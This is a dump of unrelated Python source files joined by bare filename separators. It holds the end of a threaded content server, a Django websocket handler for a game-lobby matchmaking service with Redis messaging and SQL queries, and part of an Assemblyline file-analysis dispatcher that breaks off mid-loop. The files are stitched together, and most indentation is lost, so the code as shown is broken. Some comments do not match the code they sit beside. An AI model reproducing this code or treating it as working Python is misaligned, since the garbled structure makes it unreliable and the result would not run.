t = Thread(target = serve_content_provider_helper, args = (c,addr))
threads.append(t)
t.start()
for t in threads:
t.join()
c.close()
def populate_content_dict():
global content_dict, content_dictL
content_dictL.acquire()
load()
content_dictL.release()
def main():
    populate_content_dict()
threads = []
t1 = Thread(target = synchronizer)
threads.append(t1)
t1.start()
t2 = Thread(target = serve_edge_server)
threads.append(t2)
t2.start()
t3 = Thread(target = serve_content_provider)
threads.append(t3)
t3.start()
t4 = Thread(target = synchronize_receive)
threads.append(t4)
t4.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
web_socket.py
|
from channels.generic.websocket import WebsocketConsumer
from asgiref.sync import async_to_sync
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.views.decorators.csrf import csrf_exempt
import gevent
import platform
import django
import re
import json
import hashlib
import random
import base64
import time
import redis
import threading
import html
import unicodedata
import datetime
from . import GlobalVar, api_process, search_process
def string_toDatetime(st):
return datetime.datetime.strptime(st, "%Y-%m-%d %H:%M:%S")
def datetime_toString(dt):
return dt.strftime("%Y-%m-%d %H:%M:%S")
def htmlescape(text):
    # avoid shadowing the built-in str
    return html.escape(text)
def is_number(s):
try:
float(s)
return True
except ValueError:
pass
try:
unicodedata.numeric(s)
return True
except (TypeError, ValueError):
pass
return False
def websocket_add(key, values):
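    # Register a websocket consumer under the client's session key so that
    # redis_listen() can look it up later and push room events to it.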
tmp = GlobalVar.get_value('g_websocket_clients')
    if key not in tmp:
tmp[key] = values
GlobalVar.set_value('g_websocket_clients', tmp)
def websocket_del(key):
tmp = GlobalVar.get_value('g_websocket_clients')
if key in tmp:
del tmp[key]
GlobalVar.set_value('g_websocket_clients', tmp)
def websocket_find(sec_key):
    # return None instead of raising KeyError when the client is unknown
    return GlobalVar.get_value('g_websocket_clients').get(sec_key)
def send_player_leave_room(room_id, player_name):
result = {
'msgType': 'leave_room',
'name': player_name,
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def send_match_was_finish(room_id):
result = {
'msgType': 'match_finifsh',
'name': '',
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def send_player_join_room(room_id, player_name):
result = {
'msgType': 'join_room',
'name': player_name,
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def send_player_ready(room_id, player_name):
result = {
'msgType': 'player_ready',
'name': player_name,
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def send_match_server_crash(room_id):
result = {
'msgType': 'server_crash',
'name': '',
'roomid': room_id
}
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
redis_connect.publish('room', json_encode)
def get_players_by_id(roomid):
result = {
'msgType': 'get_room_player_number',
'number': 0,
'uFuck': 0,
'success': 1
}
room = GlobalVar.runSQL(
'SELECT * FROM roomlist WHERE `RoomID` = %s LIMIT 1', (roomid))
if not room:
result['uFuck'] = 1
return json.dumps(result)
number = room[0][GlobalVar.sql_roomlist_PlayerNumber]
result['number'] = number
return json.dumps(result)
def get_rand_roomlist():
    # The frontend can display at most 12 rooms
result = {
'msgType': 'get_rand_roomlist',
'roomlist': 'null',
'success': 1
}
all_room = GlobalVar.runSQL(
'SELECT * FROM roomlist WHERE `StartSearch` = 0 AND `ingame` = 0 AND `PlayerNumber` < 5 AND `public` = 1')
if not all_room:
return json.dumps(result)
room_infos = {
# 'RoomID': {
# 'players': 0,
# 'ico': 'default.jpg',
# 'title': 'title',
# 'text': 'text',
# 'maps': []
# }
}
if len(all_room) <= 8:
for index in range(len(all_room)):
roomid = all_room[index][GlobalVar.sql_roomlist_RoomID]
room_config_decode = api_process.process_playerlist_decode(
all_room[index][GlobalVar.sql_roomlist_config])
room_infos[roomid] = {
'players': all_room[index][GlobalVar.sql_roomlist_PlayerNumber],
'ico': room_config_decode['ico'],
'title': room_config_decode['title'],
'text': room_config_decode['text'],
'maps': room_config_decode['maps']
}
else:
        # pick 8 distinct random rooms; randint's upper bound is inclusive,
        # so use len(all_room) - 1 to stay in range
        raned_num = []
        for index in range(0, 8):
            rand = random.randint(0, len(all_room) - 1)
            while rand in raned_num:
                rand = random.randint(0, len(all_room) - 1)
            raned_num.append(rand)
for rand in range(len(raned_num)):
index = raned_num[rand]
roomid = all_room[index][GlobalVar.sql_roomlist_RoomID]
room_config_decode = api_process.process_playerlist_decode(
all_room[index][GlobalVar.sql_roomlist_config])
room_infos[roomid] = {
'players': all_room[index][GlobalVar.sql_roomlist_PlayerNumber],
'ico': room_config_decode['ico'],
'title': room_config_decode['title'],
'text': room_config_decode['text'],
'maps': room_config_decode['maps']
}
result['roomlist'] = json.dumps(room_infos)
return json.dumps(result)
def reflush_room_config(roomlist_data):
result = {
'msgType': 'reflush_room_config',
'config': {},
'public': 1,
'success': 1
}
room_config_decode = api_process.process_playerlist_decode(
roomlist_data[0][GlobalVar.sql_roomlist_config])
result['config'] = json.dumps(room_config_decode)
result['public'] = roomlist_data[0][GlobalVar.sql_roomlist_public]
return json.dumps(result)
def map_sec_check(maps):
know_maps = {'de_dust2': 1, 'de_inferno': 1, 'de_nuke': 1, 'de_mirage': 1,
'de_overpass': 1, 'de_cache': 1, 'de_train': 1, 'de_cbble': 1}
for index in range(len(maps)):
if not maps[index] in know_maps:
return False
return True
def checkmatchserver(matchid,roomid):
result = {
'msgType': 'heartbeat_match',
'success': 1
}
if matchid == '':
return json.dumps(result)
check = GlobalVar.runSQL('SELECT * FROM matching WHERE `matchid` = %s limit 1', matchid)
if not check:
return json.dumps(result)
start_time = check[0][GlobalVar.sql_matching_uptime]
end_time = datetime.datetime.now()
sec = (end_time - start_time).seconds
if sec < 60:
return json.dumps(result)
else:
serverid = check[0][GlobalVar.sql_matching_serverid]
team_blue_roomid = api_process.process_playerlist_decode(check[0][GlobalVar.sql_matching_team_blue])
team_red_roomid = api_process.process_playerlist_decode(check[0][GlobalVar.sql_matching_team_red])
all_roomid = team_red_roomid + team_blue_roomid
GlobalVar.runSQL("update matchserver set `matching` = 3 where `serverID` = %s limit 1", serverid)
GlobalVar.runSQL("delete from matching where `matchid` = %s limit 1", matchid)
for index in range(len(all_roomid)):
GlobalVar.runSQL(
"update roomlist set `ingame` = 0 where `RoomID` = %s limit 1", all_roomid[index])
send_match_server_crash(all_roomid[index])
return json.dumps(result)
def get_match_info(roomid):
result = {
'msgType': 'get_match_infos',
'ingame': 1,
'matchid': '',
'map': '',
'serverid': '',
'server_location': '',
'team_blue_players': [],
'team_red_players': [],
'ipaddr': '',
'port': 27015,
'elo': '0',
'success': 0
}
check = GlobalVar.runSQL(
'SELECT * FROM userdata WHERE `roomid` = %s LIMIT 1', roomid)
if not check:
return json.dumps(result)
matchid = check[0][GlobalVar.sql_userdata_matching]
if matchid == '0':
result['success'] = 1
result['ingame'] = 0
return json.dumps(result)
check = GlobalVar.runSQL(
'SELECT * FROM matching WHERE `matchid` = %s LIMIT 1', matchid)
if not check:
return json.dumps(result)
result['success'] = 1
result['matchid'] = matchid
result['map'] = check[0][GlobalVar.sql_matching_map]
result['serverid'] = check[0][GlobalVar.sql_matching_serverid]
result['team_blue_players'] = check[0][GlobalVar.sql_matching_team_blue_players]
result['team_red_players'] = check[0][GlobalVar.sql_matching_team_red_players]
server_info = GlobalVar.runSQL(
'SELECT * FROM matchserver WHERE `serverID` = %s LIMIT 1', result['serverid'])
result['ipaddr'] = server_info[0][GlobalVar.sql_matchserver_ip]
result['server_location'] = server_info[0][GlobalVar.sql_matchserver_location]
result['port'] = server_info[0][GlobalVar.sql_matchserver_port]
return json.dumps(result)
def up_room_info(data, roomlist_data, name):
result = {
'msgType': 'up_room_info',
'name': name,
'roomid': '',
'success': 1
}
sec_key = data['key']
result['roomid'] = roomlist_data[0][GlobalVar.sql_roomlist_RoomID]
room_config_decode = api_process.process_playerlist_decode(
roomlist_data[0][GlobalVar.sql_roomlist_config])
if not map_sec_check(data['maps']):
return
if not data['maps']:
return
if not is_number(data['public']):
return
    # allow these to be a bit longer
if len(data['title']) > 9 or len(data['text']) > 30:
return
# ico
# public
room_config_decode['title'] = htmlescape(data['title'])
room_config_decode['text'] = htmlescape(data['text'])
room_config_decode['maps'] = data['maps']
room_config_decode['public'] = data['public']
room_config_encode = api_process.process_playerlist_encode(
room_config_decode).decode(encoding='GBK')
GlobalVar.runSQL('UPDATE roomlist SET `config` = %s,`public` = %s WHERE `RoomID` = %s LIMIT 1',
(room_config_encode, data['public'], roomlist_data[0][GlobalVar.sql_roomlist_RoomID]))
GlobalVar.runSQL(
'UPDATE userdata SET `roomconfig` = %s WHERE `Key` = %s LIMIT 1', (room_config_encode, sec_key))
json_encode = api_process.process_playerlist_encode(
result).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
    # json_encode is already an encoded payload; publish it directly,
    # matching the other room-event senders
    redis_connect.publish('room', json_encode)
return
def send_chat(text,roomid):
result = {
'msgType': 'send_chat',
'success': 1
}
text_encode = htmlescape(text)
result_push = {
'msgType': 'chat_reve',
'name': text_encode,
'roomid': roomid,
'success': 1
}
json_encode = api_process.process_playerlist_encode(
result_push).decode(encoding='GBK')
redis_connect = GlobalVar.get_value('g_redis_server')
    # publish the already-encoded payload directly, as the other senders do
    redis_connect.publish('room', json_encode)
return json.dumps(result)
def redis_listen():
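    # Background thread: subscribe to the 'room' channel on Redis and fan
    # each published room event out to every websocket client whose userdata
    # row belongs to that room (skipping the sender for join/leave messages,
    # and clearing the roomid on 'kick').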
redis_connect = GlobalVar.get_value('g_redis_server')
redis_pubsub = redis_connect.pubsub()
redis_pubsub.subscribe('room')
for msg in redis_pubsub.listen():
if msg['type'] == 'message':
result = {
'msgType': 'null',
'name': 'null',
'success': 1
}
try:
json_decode = api_process.process_playerlist_decode(
msg['data'])
result['msgType'] = json_decode['msgType']
result['name'] = json_decode['name']
check = GlobalVar.runSQL(
'SELECT * FROM userdata WHERE `roomid` = %s', json_decode['roomid'])
if check:
for index in range(len(check)):
if json_decode['msgType'] == 'join_room' or json_decode['msgType'] == 'leave_room':
if check[index][GlobalVar.sql_userdata_username] == json_decode['name']:
continue
key = check[index][GlobalVar.sql_userdata_Key]
obj_websocket = websocket_find(key)
#if check[0][GlobalVar.sql_userdata_banned]:
# return obj_websocket.close()
if obj_websocket:
obj_websocket.send(json.dumps(result))
if result['msgType'] == 'kick':
GlobalVar.runSQL(
"UPDATE userdata SET `roomid` = '0' WHERE `Key` = %s LIMIT 1", key)
except:
continue
class websocket_main(WebsocketConsumer):
def connect(self):
if not GlobalVar.get_value('g_init_redis'):
threading.Thread(target=redis_listen, args=()).start()
GlobalVar.set_value('g_init_redis', True)
self.accept()
def disconnect(self, close_code):
try:
if self.sec_key:
api_process.process_exit_room(self.sec_key)
websocket_del(self.sec_key)
except:
pass
def receive(self, text_data):
result = {
'msgType': 'get_room_info',
'uFuck': 1,
'RoomID': 'NULL',
'playerlist': 'NULL',
'is_ingame': 0,
'is_search': 0,
'player_num': 0,
'freezetime': 0,
'success': 0
}
if text_data == 'ping':
return self.send('pong')
        # TODO: wrap this block in try/except; "if True:" is a placeholder
        if True:
data = json.loads(text_data)
if 'key' in data:
sec_key = data['key']
user_data = api_process.process_getdata_by_key(sec_key)
if not user_data:
return self.send(json.dumps(result))
if user_data[0][GlobalVar.sql_userdata_roomid] == '0':
return self.send(json.dumps(result))
roomlist_data = GlobalVar.runSQL(
'SELECT * FROM roomlist WHERE `RoomID` = %s LIMIT 1', (user_data[0][GlobalVar.sql_userdata_roomid]))
if not roomlist_data:
return self.send(json.dumps(result))
if user_data[0][GlobalVar.sql_userdata_banned]:
result['success'] = 1
result['msgType'] = 'banned'
return self.send(json.dumps(result))
self.sec_key = data['key']
self.room_id = user_data[0][GlobalVar.sql_userdata_roomid]
websocket_add(data['key'], self)
username = user_data[0][GlobalVar.sql_userdata_username]
if data['request'] == 'get_room_info':
result['success'] = 1
result['uFuck'] = 0
result['playerlist'] = roomlist_data[0][GlobalVar.sql_roomlist_PlayerList]
result['is_ingame'] = roomlist_data[0][GlobalVar.sql_roomlist_ingame]
result['is_search'] = roomlist_data[0][GlobalVar.sql_roomlist_StartSearch]
result['RoomID'] = user_data[0][GlobalVar.sql_userdata_roomid]
result['player_num'] = roomlist_data[0][GlobalVar.sql_roomlist_PlayerNumber]
return self.send(json.dumps(result))
if data['request'] == 'room_do_ready':
result['playerlist'] = 'null'
ban_time = user_data[0][GlobalVar.sql_userdata_match_ban]
if ban_time != '0':
end_time = datetime.datetime.now()
start_time = string_toDatetime(ban_time)
sec = (end_time - start_time).seconds
if sec <= 1800:
result['msgType'] = 'do_ready'
result['success'] = 1
result['uFuck'] = 3
result['freezetime'] = 1800 - sec
return self.send(json.dumps(result))
self.send(search_process.do_ready(
self, data, roomlist_data, user_data))
return send_player_ready(user_data[0][GlobalVar.sql_userdata_roomid], username)
if data['request'] == 'rand_get_room':
return self.send(get_rand_roomlist())
if data['request'] == 'get_room_players_number':
return self.send(get_players_by_id(data['other']))
if data['request'] == 'up_room_infos':
up_room_info(data, roomlist_data, username)
return
if data['request'] == 'reflush_room_config':
return self.send(reflush_room_config(roomlist_data))
if data['request'] == 'exit_room':
return self.disconnect(0)
if data['request'] == 'getMatchInfo':
return self.send(get_match_info(self.room_id))
if data['request'] == 'heartbeat_match':
return self.send(checkmatchserver(data['matchid'],self.room_id))
if data['request'] == 'send_chat':
return self.send(send_chat(data['other'], self.room_id))
return self.send(json.dumps(result))
# except:
# return self.send(json.dumps(result))
|
dispatch.py
|
#!/usr/bin/env python
import logging
import os
import psutil
import riak
import signal
import socket
import threading
import time
from collections import namedtuple
from copy import deepcopy
from pprint import pformat
from assemblyline.common import net
from assemblyline.common.exceptions import get_stacktrace_info
from assemblyline.common.isotime import now_as_iso
from assemblyline.common.net import get_hostip, get_hostname, get_mac_address
from assemblyline.al.common import forge
from assemblyline.al.common import counter
from assemblyline.al.common import message
from assemblyline.al.common.queue import CommsQueue, DispatchQueue, LocalQueue, NamedQueue, reply_queue_name
from assemblyline.al.common.remote_datatypes import ExpiringSet, Hash, ExpiringHash
from assemblyline.al.common.task import Task
from assemblyline.al.core.datastore import compress_riak_key
config = forge.get_config()
persistent = {
'db': config.core.redis.persistent.db,
'host': config.core.redis.persistent.host,
'port': config.core.redis.persistent.port,
}
Classification = forge.get_classification()
DONE = len(config.services.stages) + 1
counts = None # Created when dispatcher starts.
log = logging.getLogger('assemblyline.dispatch')
class DispatchException(Exception):
pass
Entry = namedtuple('Entry', ['dispatcher', 'task', 'retries', 'parents',
'completed_children', 'extracted_children', 'outstanding_children',
'acknowledged_services', 'completed_services', 'dispatched_services',
'outstanding_services'])
Timeout = namedtuple('Timeout', ['sid', 'srl', 'data', 'time'])
def eligible_parent(service_manager, task):
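    # Returns True when the service that produced this child task is listed
    # in the task's eligible_parents (after category expansion), or when no
    # eligible_parents restriction applies.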
if not isinstance(task.eligible_parents, list) or not task.service_name:
return True
eligible_parents = service_manager.expand_categories(task.eligible_parents)
if task.service_name in eligible_parents:
return True
return False
def CreateEntry(dispatcher, task, now):
parent = None
psrl = task.psrl
sid = task.sid
srl = task.srl
if not psrl:
if task.quota_item and task.submitter:
log.info(
"Submission %s counts toward quota for %s",
sid, task.submitter
)
Hash('submissions-' + task.submitter, **persistent).add(
sid, now_as_iso()
)
else:
# This task has a parent.
try:
parent = dispatcher.entries[sid][psrl]
parent_task = parent.task
# Child inherits parent's selected (and skipped) services
# + any specifically added by the child.
task.selected = (task.selected or []) + \
(parent_task.selected or []) + (parent_task.skipped or [])
if eligible_parent(dispatcher.service_manager, task):
# Child inherits parent's excluded services
# + any specifically excluded by the child.
task.excluded = (task.excluded or []) + \
(parent_task.excluded or [])
else:
task.excluded = task.selected
except KeyError:
# Couldn't find parent. It might have been filtered out.
dispatcher.debug("Couldn't find parent (%s) of %s/%s",
psrl, sid, srl)
return None
# Create acked, completed, dispatched and outstanding service structures.
a, c, d, o = dispatcher.service_manager.determine_services(task, now)
# Make sure the initial score is set to 0.
task.score = 0
task.max_score = 0
# Tuples are immutable so we have to store the entry's stage on the task.
task.stage = 0
entry = Entry(dispatcher, task, {}, [], {}, {}, {}, a, c, d, o)
if parent:
# Set up parent/child links.
entry.parents.append(parent)
if not srl in parent.outstanding_children and \
not srl in parent.completed_children:
parent.outstanding_children[srl] = entry
return entry
def RemoveEntry(dispatcher, entry, sid, srl, now):
# The only way for a task to be complete is for all its children
# to be complete. This means we can remove a completed task because
# there are, by definition, no outstanding children.
entries = dispatcher.entries
files = entries.get(sid, {})
if files.pop(srl, None):
dispatcher.completed[sid][srl] = entry.task.classification
parents = entry.parents
if parents:
dispatcher.debug("Child completed: %s/%s", sid, srl)
# Move to completed_children on parent(s) and update parent(s).
for p in parents:
o = p.outstanding_children.pop(srl, None)
if o:
p.completed_children[srl] = o
UpdateEntry(p, now)
else:
dispatcher.debug("Parent completed: %s/%s", sid, srl)
task = entry.task
sid = task.sid
dispatcher.storage_queue.push({
'type': 'complete',
'expiry': task.__expiry_ts__,
'filescore_key': task.scan_key,
'now': now,
'psid': task.psid,
'score': int(dispatcher.score.get(sid, None) or 0),
'sid': sid,
})
# If there are outstanding srls, return.
if len(files):
return
if task.quota_item and task.submitter:
log.info(
"Submission %s no longer counts toward quota for %s",
sid, task.submitter
)
Hash('submissions-' + task.submitter, **persistent).pop(sid)
# If there are no outstanding srls, remove this sid as well.
entries.pop(sid)
# Update the scan object.
c12ns = dispatcher.completed.pop(sid).values()
classification = Classification.UNRESTRICTED
for c12n in c12ns:
classification = Classification.max_classification(
classification, c12n
)
results = dispatcher.results.pop(sid, [])
errors = dispatcher.errors.pop(sid, [])
raw = None
if task.completed_queue:
raw = deepcopy(task.raw)
raw.update({
'errors': errors,
'results': results,
'error_count': len(set([x[:64] for x in errors])),
'file_count': len(set([x[:64] for x in errors + results])),
})
dispatcher.storage_queue.push({
'type': 'finalize',
'classification': classification,
'completed_queue': task.completed_queue,
'errors': errors,
'results': results,
'score': int(dispatcher.score.pop(sid, None) or 0),
'sid': sid,
'watchers': dispatcher.watchers.pop(sid, {}),
'raw': raw,
})
return
def UpdateEntry(entry, now):
dispatcher = entry.dispatcher
task = entry.task
sid = task.sid
srl = task.srl
stage = task.stage
acknowledged_services = entry.acknowledged_services
dispatched_services = entry.dispatched_services
outstanding_services = entry.outstanding_services
# Move to the next stage if task's current stage is complete.
while not stage or stage != DONE \
and not acknowledged_services[stage] \
and not dispatched_services[stage] \
and not outstanding_services[stage]:
stage += 1
task.stage = stage
# Check if any and all children are complete for this task.
if stage == DONE:
counts.increment('dispatch.files_completed')
ExpiringSet(task.get_tag_set_name()).delete()
ExpiringHash(task.get_submission_tags_name()).delete()
if entry.outstanding_children or entry.extracted_children:
return False
# TODO: Insert sanity checks.
# This file is done.
if dispatcher.score[sid] is None or task.score > dispatcher.score[sid]:
dispatcher.score[sid] = task.score
else:
task.score = dispatcher.score[sid]
# raw = None
# if task.completed_queue and not task.psrl:
# results = dispatcher.results.get(sid, [])
# errors = dispatcher.errors.get(sid, [])
# raw = task.raw
# raw.update({
# 'errors': errors,
# 'results': results,
# 'error_count': len(set([x[:64] for x in errors])),
# 'file_count': len(set([x[:64] for x in errors + results])),
# })
# NamedQueue(task.completed_queue).push(raw)
RemoveEntry(dispatcher, entry, sid, srl, now)
return True
# This task is not done if there are dispatched services.
if dispatched_services[stage]:
return False
# Dispatch.
dispatched_services[stage] = to_dispatch = outstanding_services[stage]
entry.outstanding_services[stage] = {}
entry.dispatcher.debug("%s is now stage %d", task.srl, stage)
for service in to_dispatch.itervalues():
entry.dispatcher.debug("Dispatching %s to: %s", task.srl, service.name)
entry.dispatcher.dispatch(service, entry, now)
return False
q = DispatchQueue()
class Dispatcher(object):
# Instead of having a dynamic dict, __slots__ defines a static structure.
# Access to member variables defined in this way is more efficient (but
# as a side effect we lose the ability to add members dynamically).
__slots__ = ('ack_timeout', 'child_timeout', 'completed', 'control_queue',
'debug', 'drain', 'entries', 'errors', 'high', 'ingest_queue',
'last_check', 'lock', 'pop', 'queue_size', 'response_queue',
'results', 'running', 'score', 'service_manager',
'service_timeout', 'shard', 'storage_queue',
'watchers', 'hostinfo')
def __init__(self, service_manager, #pylint: disable=R0913
control_queue=None, debug=False,
high=config.core.dispatcher.max.inflight/config.core.dispatcher.shards,
pop=forge.get_dispatch_queue().pop,
shard='0'):
if debug:
self.debug = log.info
else:
self.debug = lambda *msg: None
self.hostinfo = {
            'ip': get_hostip(),
'mac_address': get_mac_address(),
'host': get_hostname(),
}
self.ack_timeout = {}
self.child_timeout = {}
self.completed = {}
self.control_queue = control_queue or \
forge.get_control_queue('control-queue-' + shard)
self.drain = False
self.entries = {}
self.errors = {}
self.high = high
self.ingest_queue = 'ingest-queue-' + shard
self.last_check = 0
self.lock = threading.Lock()
self.pop = pop
self.queue_size = {}
        # Response queues are named: <hostname>-<pid>-<seconds>-<shard>.
self.response_queue = '-'.join((socket.gethostname(), str(os.getpid()),
str(int(time.time())), shard))
self.results = {}
self.running = False
self.score = {}
self.service_manager = service_manager
self.service_timeout = {}
self.shard = shard
self.storage_queue = LocalQueue()
self.watchers = {}
log.info('Dispatcher started. Dispatching to services:{0}'.format(
[s for s in service_manager.services]))
def _service_info(self):
list_result = {}
now = time.time()
for service in self.service_manager.services.itervalues():
is_up = not self._service_is_down(service, now)
list_result[service.name] = {
'is_up': is_up,
'accepts': service.accepts,
'details': service.metadata
}
return list_result
def _service_is_down(self, service, now):
last = service.metadata['last_heartbeat_at']
return now - last > config.system.update_interval * 6
def acknowledged(self, task, now=None):
if not now:
now = time.time()
entries = self.entries
sender = task.service_name
sid = task.sid
srl = task.srl
# Make sure the entry exists.
submission = entries.get(sid, None)
if not submission:
return
entry = submission.get(srl, None)
if not entry:
return
# Mark this service as acknowledged.
stage = self.service_manager.stage_by_name(sender)
service_entry = entry.dispatched_services[stage].pop(sender, None)
if not service_entry:
return
entry.acknowledged_services[stage][sender] = service_entry
seconds = task.seconds
# Add the timeout to the end of its respective list.
service_timeout = self.service_timeout
lst = service_timeout.get(seconds, [])
lst.append(Timeout(sid, srl, sender, now + float(seconds)))
service_timeout[seconds] = lst
def check_timeouts(self, now=None):
if not now:
now = time.time()
# Make sure the right amount of time has elapsed since our last check.
if now - self.last_check < config.system.update_interval:
return
self.last_check = now
with self.lock:
try:
self.process_timeouts('acknowledged_services', now,
'Ack timeout', self.ack_timeout)
self.process_timeouts('completed_services', now,
'Service timeout',
self.service_timeout)
timeouts = self.child_timeout
for k, v in timeouts.iteritems():
start = 0
timeouts[k] = []
for t in v:
# Timeouts are added to the end of their list so
# when we reach the first non-timed out timeout,
# we are done.
if t.time >= now:
break
# Timeouts remain active (so that we don't have
# to scan for them when removing tasks that have
                        # completed), so it is possible for a timeout to
# refer to an id that no longer exists.
submission = self.entries.get(t.sid, None)
if submission:
entry = submission.get(t.srl, None)
if entry:
if entry.extracted_children.pop(t.data, None):
log.info('Child %s of parent %s timed out',
t.data, t.srl)
UpdateEntry(entry, now)
start += 1
# Remove processed timeouts.
timeouts[k] = v[start:] + timeouts[k]
except Exception as ex: #pylint: disable=W0703
trace = get_stacktrace_info(ex)
log.error('Problem processing timeouts: %s', trace)
def dispatch(self, service, entry, now):
task = entry.task
sid = task.sid
srl = task.srl
name = service.name
queue_size = self.queue_size[name] = self.queue_size.get(name, 0) + 1
entry.retries[name] = entry.retries.get(name, -1) + 1
if task.profile:
if entry.retries[name]:
log.info('%s Graph: "%s" -> "%s/%s" [label=%d];',
sid, srl, srl, name, entry.retries[name])
else:
log.info('%s Graph: "%s" -> "%s/%s";',
sid, srl, srl, name)
log.info('%s Graph: "%s/%s" [label=%s];',
sid, srl, name, name)
file_count = len(self.entries[sid]) + len(self.completed[sid])
# Warning: Please do not change the text of the error messages below.
msg = None
if self._service_is_down(service, now):
msg = 'Service down.'
elif entry.retries[name] > config.core.dispatcher.max.retries:
msg = 'Max retries exceeded.'
elif entry.retries[name] >= 1:
log.debug("Retry sending %s/%s to %s", sid, srl, name)
elif task.depth > config.core.dispatcher.max.depth:
msg = 'Max depth exceeded.'
elif file_count > config.core.dispatcher.max.files:
msg = 'Max files exceeded.'
if msg:
log.debug(' '.join((msg, "Not sending %s/%s to %s." % \
(sid, srl, name))))
response = Task(deepcopy(task.raw))
response.watermark(name, '')
response.nonrecoverable_failure(msg)
self.storage_queue.push({
'type': 'error',
'name': name,
'response': response,
})
return False
if service.skip(task):
response = Task(deepcopy(task.raw))
response.watermark(name, '')
response.success()
q.send_raw(response.as_dispatcher_response())
return False
# Setup an ack timeout.
seconds = min(service.timeout * (queue_size + 5), 7200)
task.ack_timeout = seconds
task.sent = now
service.proxy.execute(task.priority, task.as_service_request(name))
# Add the timeout to the end of its respective list.
ack_timeout = self.ack_timeout
lst = ack_timeout.get(seconds, [])
lst.append(Timeout(sid, srl, name, now + seconds))
ack_timeout[seconds] = lst
return True
def heartbeat(self):
while not self.drain:
with self.lock:
heartbeat = {
'shard': self.shard,
'entries': len(self.entries),
'errors': len(self.errors),
'results': len(self.results),
'resources': {
"cpu_usage.percent": psutil.cpu_percent(),
"mem_usage.percent": psutil.phymem_usage().percent,
"disk_usage.percent": psutil.disk_usage('/').percent,
"disk_usage.free": psutil.disk_usage('/').free,
},
'services': self._service_info(),
'queues': {
'max_inflight': self.high,
'control': self.control_queue.length(),
'ingest': q.length(self.ingest_queue),
'response': q.length(self.response_queue),
},
}
heartbeat['hostinfo'] = self.hostinfo
msg = message.Message(to="*", sender='dispatcher',
mtype=message.MT_DISPHEARTBEAT, body=heartbeat)
CommsQueue('status').publish(msg.as_dict())
time.sleep(1)
def interrupt(self, unused1, unused2): #pylint: disable=W0613
if self.drain:
log.info('Forced shutdown.')
self.running = False
return
log.info('Shutting down gracefully...')
# Rename control queue to 'control-<hostname>-<pid>-<seconds>-<shard>'.
self.control_queue = \
forge.get_control_queue('control-' + self.response_queue)
self.drain = True
def poll(self, n):
"""Poll for n responses/resubmissions and (max - n) submissions"""
# Process control messages.
msg = self.control_queue.pop(blocking=False)
while msg:
with self.lock:
self.process(msg)
msg = self.control_queue.pop(blocking=False)
# Grab n responses/resubmissions from our queue.
submissions = self.pop(self.response_queue, self.high)
# Grab (max - n) new submissions from our ingest queue.
n = self.high - n
if not self.drain and n > 0:
submissions += self.pop(self.ingest_queue, n)
# Process the responses/resubmissions and submissions.
# ... "for decisions and revisions which a minute will reverse" ;-)
n = len(submissions)
for submission in submissions:
with self.lock:
self.process(submission)
return n
def process(self, msg):
func = None
task = Task.wrap(msg)
if not msg:
log.warning("Got 'None' msg")
return
try:
func = self.__getattribute__(task.state)
except AttributeError:
log.warning('Unknown message type: %s', task.state)
try:
func(task)
except Exception as ex: #pylint: disable=W0703
trace = get_stacktrace_info(ex)
log.error('Problem processing %s: %s', pformat(task.raw), trace)
def process_timeouts(self, name, now, msg, timeouts):
services = self.service_manager.services
# Timeouts are stored in lists according to the timeout seconds.
for k, v in timeouts.items():
start = 0
timeouts[k] = []
for t in v:
# Timeouts are added to the end of their list so when we
# reach the first non-timed out timeout, we are done.
if t.time >= now:
break
# Timeouts remain active (so that we don't have to scan
                # for them when removing tasks that have completed), so it
# is possible for a timeout to refer to an id that no
# longer exists.
if self.redispatch(name, t.sid, t.srl,
services[t.data], msg, now):
timeouts[k].append(Timeout(t.sid, t.srl, t.data, now + k))
start += 1
# Remove processed timeouts.
timeouts[k] = v[start:] + timeouts[k]
def redispatch(self, name, sid, srl, service, reason, now):
entry = None
try:
entry = self.entries[sid][srl]
except KeyError:
return False
try:
stage = self.service_manager.stage_by_name(service.name)
d = getattr(entry, name)[stage]
c = entry.completed_services[stage]
if service.name in c or d and service.name in d:
return False
log.info("%s for %s: %s/%s", reason, service.name, sid, srl)
self.dispatch(service, entry, now)
return True
except Exception as ex: #pylint: disable=W0703
trace = get_stacktrace_info(ex)
log.error("Couldn't redispatch to %s for %s/%s: %s",
service.name, sid, srl, trace)
response = Task(deepcopy(entry.task.raw))
response.watermark(service.name, '')
response.nonrecoverable_failure(trace)
self.storage_queue.push({
'type': 'error',
'name': service.name,
'response': response,
})
return False
def serviced(self, task, now=None):
if not now:
now = time.time()
entries = self.entries
sender = task.service_name
sid = task.sid
srl = task.srl
services = self.service_manager.services
stage = self.service_manager.stage_by_name(sender)
status = task.status or ''
# Make sure the entry exists.
submission = entries.get(sid, None)
if not submission:
log.debug("Couldn't find sid for: %s", task.raw)
return
entry = submission.get(srl, None)
if not entry:
log.debug("Couldn't find srl for: %s", task.raw)
return
# Move this service from dispatched to completed.
asvc = entry.acknowledged_services[stage].get(sender, None)
dsvc = entry.dispatched_services[stage].get(sender, None)
svc = asvc or dsvc
if not svc:
log.debug("Service already completed for: %s", task.raw)
return
queue_size = self.queue_size.get(sender, 0)
if queue_size:
self.queue_size[sender] = queue_size - 1
if task.profile:
log.info('%s Graph: "%s/%s" -> "%s/%s/%s";',
sid, srl, sender, srl, sender, status)
log.info('%s Graph: "%s/%s/%s" [label="%s"];',
sid, srl, sender, status, status)
if task.dispatch_queue != self.response_queue:
raise Exception("Queue is %s. Should be %s." % \
(task.dispatch_queue, self.response_queue))
# Send the cache_key to any watchers ...
cache_key = task.cache_key
if cache_key:
msg = {'status': status[:4], 'cache_key': cache_key}
for w in self.watchers.get(sid, {}).itervalues():
